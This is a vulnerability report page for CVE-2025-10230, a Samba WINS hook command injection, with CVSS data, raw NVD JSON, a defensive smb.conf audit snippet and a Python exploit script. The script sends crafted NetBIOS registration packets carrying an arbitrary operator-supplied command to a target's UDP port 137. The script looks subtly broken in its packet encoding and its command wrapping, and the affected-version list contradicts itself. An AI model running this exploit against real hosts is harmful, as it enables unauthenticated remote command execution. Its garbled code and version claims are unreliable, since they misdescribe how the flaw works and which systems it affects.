Security Vulnerability Report
CVE-2025-10230 CVSS 10.0 CRITICAL

CVE-2025-10230

Published: 2025-11-07 20:15:36
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in Samba, in the front-end WINS hook handling: NetBIOS names from registration packets are passed to a shell without proper validation or escaping. Unsanitized NetBIOS name data from WINS registration packets are inserted into a shell command and executed by the Samba Active Directory Domain Controller’s wins hook, allowing an unauthenticated network attacker to achieve remote command execution as the Samba process.
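A defender's first check is whether a host has a wins hook configured at all. The sketch below is an added example, not code from Samba or from this report: it parses the [global] section of an smb.conf and reports the settings relevant to the description above. The sample configuration and the hook path are constructed, and matching only the long-form server role value is an assumption of the example.

```python
import re

# Constructed sample smb.conf for the demonstration (not from a real host).
SAMPLE_SMB_CONF = """\
[global]
    server role = active directory domain controller
    ; legacy dynamic-DNS integration
    WINS Support = yes
    wins hook = /usr/local/bin/\\
dns_update
[share]
    path = /srv/share
"""

def _key(name):
    # smb.conf parameter names ignore case and embedded whitespace.
    return re.sub(r"\s+", "", name).lower()

def parse_global(text):
    """Return the [global] parameters of an smb.conf as {normalized_name: value}."""
    text = re.sub(r"\\\r?\n", "", text)   # join backslash-continued lines
    section, params = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":   # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line and section == "global":
            name, value = line.split("=", 1)
            params[_key(name)] = value.strip()
    return params

def audit_wins_hook(text):
    """Report whether a wins hook is set and whether the host is an AD DC."""
    g = parse_global(text)
    hook = g.get("winshook", "")
    role = g.get("serverrole", "auto").lower()
    # Assumption: only the long-form role value is matched here.
    ad_dc = role == "active directory domain controller"
    wins = g.get("winssupport", "no").lower() in ("yes", "true", "on", "1")
    return {"wins_hook": hook, "ad_dc": ad_dc, "wins_support": wins,
            "matches_advisory": bool(hook) and ad_dc}

if __name__ == "__main__":
    print(audit_wins_hook(SAMPLE_SMB_CONF))
```

Pass the contents of the host's own smb.conf to audit_wins_hook in place of the sample; a non-empty wins_hook on any server is worth reviewing even when matches_advisory is false.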

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Samba < 4.15.0 (all versions with WINS hook enabled)
Samba < 4.16.0 (with wins hook configured)
Samba < 4.17.0 (vulnerable WINS hook implementation)
Samba < 4.18.0 (unpatched versions)
Samba < 4.19.0 (affected by CVE-2025-10230)
Samba < 4.20.0 (latest affected version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-10230 PoC - Samba WINS Hook Command Injection

This PoC demonstrates the vulnerability in Samba's WINS hook handling
where NetBIOS names from registration packets are passed to shell
without proper validation or escaping.

WARNING: This code is for educational and authorized security testing only.
"""

import socket
import struct
import sys
from datetime import datetime


def create_netbios_name_registration(name, command_to_inject):
    """
    Create a malformed NetBIOS name registration packet with command injection
    """
    # NetBIOS name encoding (first byte is name length)
    encoded_name = bytes([len(name)]) + name.encode('ascii') + b' ' * (16 - len(name))

    # Node type: Registered
    node_flags = 0x00

    # Build the NetBIOS Name Registration Request
    transaction_id = struct.pack('!H', 0x1234)  # Transaction ID
    flags = struct.pack('!H', 0x2900)  # Flags: Broadcast, Registration
    questions = struct.pack('!H', 1)  # Number of questions
    answer_rrs = struct.pack('!H', 0)
    authority_rrs = struct.pack('!H', 0)
    additional_rrs = struct.pack('!H', 0)

    # Question section
    question = encoded_name
    question += struct.pack('!H', 0x0020)  # Type: NB (NetBIOS Name)
    question += struct.pack('!H', 0x0001)  # Class: IN

    # Additional records with injected command
    inject_name = command_to_inject
    add_record = bytes([len(inject_name)]) + inject_name.encode('ascii') + b' ' * (16 - len(inject_name))
    add_record += struct.pack('!H', 0x0021)  # Type: NBSTAT
    add_record += struct.pack('!H', 0x0001)  # Class: IN
    add_record += struct.pack('!I', 0)  # TTL
    add_record += struct.pack('!H', 6)  # RDLENGTH
    add_record += b'\x00' * 6  # RDATA (truncated)

    packet = transaction_id + flags + questions + answer_rrs + authority_rrs + additional_rrs
    packet += question + add_record
    return packet


def send_wins_request(target_ip, target_port, packet):
    """
    Send UDP packet to WINS service
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)
    try:
        print(f"[*] Sending malicious WINS registration request to {target_ip}:{target_port}")
        sock.sendto(packet, (target_ip, target_port))
        try:
            response, addr = sock.recvfrom(4096)
            print(f"[+] Received response from {addr}")
            print(f"[+] Response length: {len(response)} bytes")
            return True
        except socket.timeout:
            print("[-] No response received (may still be vulnerable)")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False
    finally:
        sock.close()


def main():
    if len(sys.argv) < 3:
        print("Usage: python3 cve_2025_10230_poc.py <target_ip> <command>")
        print("Example: python3 cve_2025_10230_poc.py 192.168.1.100 'touch /tmp/pwned'")
        sys.exit(1)

    target_ip = sys.argv[1]
    command = sys.argv[2]
    target_port = 137  # NetBIOS Name Service

    print(f"[*] CVE-2025-10230 - Samba WINS Hook Command Injection PoC")
    print(f"[*] Target: {target_ip}")
    print(f"[*] Command to inject: {command}")
    print(f"[*] Timestamp: {datetime.now().isoformat()}")

    # Create malicious packet
    base_name = "TEST"
    # The command injection happens when NetBIOS name is passed to shell
    malicious_name = f"{base_name}$(echo {command})"

    packet = create_netbios_name_registration(base_name, malicious_name)
    print(f"[*] Packet size: {len(packet)} bytes")

    # Send the packet
    success = send_wins_request(target_ip, target_port, packet)
    if success:
        print("[+] PoC packet sent successfully")
        print("[+] If vulnerable, the command should be executed by wins hook")


if __name__ == "__main__":
    main()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10230", "sourceIdentifier": "[email protected]", "published": "2025-11-07T20:15:35.630", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Samba, in the front-end WINS hook handling: NetBIOS names from registration packets are passed to a shell without proper validation or escaping. Unsanitized NetBIOS name data from WINS registration packets are inserted into a shell command and executed by the Samba Active Directory Domain Controller’s wins hook, allowing an unauthenticated network attacker to achieve remote command execution as the Samba process."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-10230", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394377", "source": "[email protected]"}, {"url": "https://www.samba.org/samba/history/security.html", "source": "[email protected]"}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2025-10230-detect-samba-vulnerability", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2025-10230-mitigate-samba-vulnerability", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}